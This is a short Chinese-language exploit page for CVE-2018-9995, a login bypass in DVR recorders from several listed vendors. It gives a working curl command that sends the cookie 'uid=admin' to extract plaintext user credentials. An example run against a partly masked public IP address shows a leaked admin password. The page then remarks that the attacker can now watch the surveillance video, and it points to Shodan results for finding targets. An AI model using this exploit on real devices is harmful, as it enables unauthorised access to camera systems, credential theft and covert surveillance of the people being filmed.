TBK DVR Login Bypass（CVE-2018-9995）

简介

多款 DVR（硬盘录像机） 设备可提取明文凭证。

如果 cookie 中包含 uid=admin , 那么响应的数据包中会包含明文的密码。

受影响的厂商/标识

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: “XVR Login”)
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MDVR Login

Exploit

curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Example

# curl "http://217.131.xx.x:84/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
{"result":0,"list":[{"uid":"admin","pwd":"ozer","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}

我们已经获取了密码，现在可以查看监控视频了。

相关链接

• shodan 搜索结果
• CVE-2018-9995_dvr_credentials (github)